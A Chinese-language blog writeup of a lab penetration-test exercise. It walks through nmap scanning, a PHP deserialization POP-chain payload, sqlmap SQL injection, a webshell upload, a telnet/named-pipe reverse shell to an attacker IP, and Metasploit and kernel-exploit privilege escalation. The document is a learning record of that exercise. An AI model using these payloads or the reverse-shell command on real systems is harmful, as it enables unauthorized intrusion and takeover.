考核-渗透

学习笔记
字数统计: 947   |   阅读时长≈ 4 分钟

先扫网

1
nmap -sn 192.168.11.1/24

image-20230124005329665

靶机是192.168.11.131

扫一下端口

1
nmap -sS -sV -T5 -A -p- 192.168.11.131

image-20230124005825745

只开了22和80两个熟悉的端口和5355

访问80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
<?php
error_reporting(0);

class web
{
    public $b1;

    public function __invoke()
    {
        $this->b1->web();
    }
    public function __wakeup() 
    {
         
        die("不许反序列化哦");

    }

}

class pwn
{
    public $r1;

    public function __destruct()
    {
        echo $this->r1 . '  --0xfa';
        
    }


    public function execute()
    {
        ($this->r1)();
    }

    public function __call($a, $b)
    {
        echo $this->r1->getFlag();
    }

}

class misc
{
    public $w;

    public function __toString()
    {
        $this->w->execute();
        return 'welcome to this game, hope you have a great day';
    }

    
}
class ctf
{
    public $c1;

    public function execute()
    {
        ($this->c1)();
    }

    public function getFlag()
    {
        require 'flag.php';
        echo $FLAG;
        
    }

}
if (!empty($_POST['cmd']))
{
    unserialize($_POST['cmd']);
}else{
    highlight_file(__FILE__);
}

dirsearch爆了一下只有flag.php,那就只能反序列化了

先看一下输入点,在index.php中用post方法传入cmd中

而最后应该利用ctf类中的getFlag函数,echo出flag

1.要调用getFlag,得从pwn类中的__call方法进入

2.要进入pwn中的__call方法,就要通过web类中__invoke()下的$this->b1->web(),令$this->b1=new pwn(),使得web()方法成为不可用的方法进入__call中

3.要进入web类中__invoke(),就要把web当成一个函数调用,可以在ctf类中使用execute()函数

4.进入ctf类的execute()函数,可以从misc下的__toString()方法进入

5.要使用__toString()方法,需要从pwn类下__destruct()方法中的字符串拼接实现

所以反序列化链:

unserialize反序列化->pwn下的__destruct()方法->misc下的__toString()方法->ctf下的execute()函数->绕过web下的__wakeup()方法->web下的__invoke()方法->pwn下的__call()方法->ctf下的getFlag()函数

构造:

1
2
3
4
5
6
7
$a=new pwn();
$a->r1=new misc();
$a->r1->w=new ctf();
$a->r1->w->c1=new web();
$a->r1->w->c1->b1=new pwn();
$a->r1->w->c1->b1->r1=new ctf();
echo serialize($a);

得到序列后的值:O:3:”pwn”:1:{s:2:”r1”;O:4:”misc”:1:{s:1:”w”;O:3:”ctf”:1:{s:2:”c1”;O:3:”web”:1:{s:2:”b1”;O:3:”pwn”:1:{s:2:”r1”;O:3:”ctf”:1:{s:2:”c1”;N;}}}}}}

web后的1改为2绕过__wakeup(),得到flag

image-20230125003958905

访问:

image-20230125004033786

1
http://192.168.11.131/Redr/oCk/Login.php

中间件是apache2.4.18,没找到漏洞利用

dirsearch扫了一下目录,试了一下利用不太到

image-20230125023004286

在登陆框打’试试能不能sql注入

image-20230125140418486

能注入,但没有回显,不方便手注

直接上sqlmap

image-20230125152718588

image-20230125152729262

image-20230125152740313

image-20230125152747414

有user表,直接看

image-20230125152801893

image-20230125152812017

拿到账号密码

还有图片上传功能

image-20230125152912999

尝试之后发现好像没有对后缀进行检测,而是对MIME类型有过滤,但是我按要求传PNG文件仍然报错

(问过学长说不影响做题,那就dirb扫一下有什么目录

image-20230125200554740

image-20230125200604749

蚁剑连一下,看看终端权限

image-20230125200635200

没权限,看看hint

image-20230125220516581

反弹个shell

1
2
3
4
靶机:
mknod a p; telnet 192.168.11.128 2222 0<a | /bin/bash 1>a
攻击机:
netcat -lvvp 2222

或者更自动化一点,用msf

image-20230127144100412

切换到后台然后找一下漏洞

image-20230127145533096

补全一下playload

image-20230127145629323

开日

image-20230127145654832

image-20230127145730742

拿到flag

image-20230127145855166

下边是手工提权然后失败的过程,还得是脚本小子好当

image-20230126194943121

试试内核漏洞然后提权

image-20230125222934524

image-20230125222947820

上面基本都试过了,要不就是编译的时候出问题,要不就是运行的时候就报错

image-20230126213257249

参考:

【日常记录】解决‘GLIBC_2.34‘ not found,并且gcc制定glibc版本编译_人间体佐菲的博客-CSDN博客

在kali攻击机重新编译之后上传到靶机

1
gcc -Wl,-rpath='/var/www/html/Redr/oCk/upload/glibc-all-in-one/libs/2.35-0ubuntu3.1_amd64',-dynamic-linker='/var/www/html/Redr/oCk/upload/glibc-all-in-one/libs/2.35-0ubuntu3.1_amd64/ld-linux-x86-64.so.2' -s 40762.c -o 40762 -lkeyutils

执行没回显

image-20230127133929635

  • Copyrights © 2022-2024 b1xcy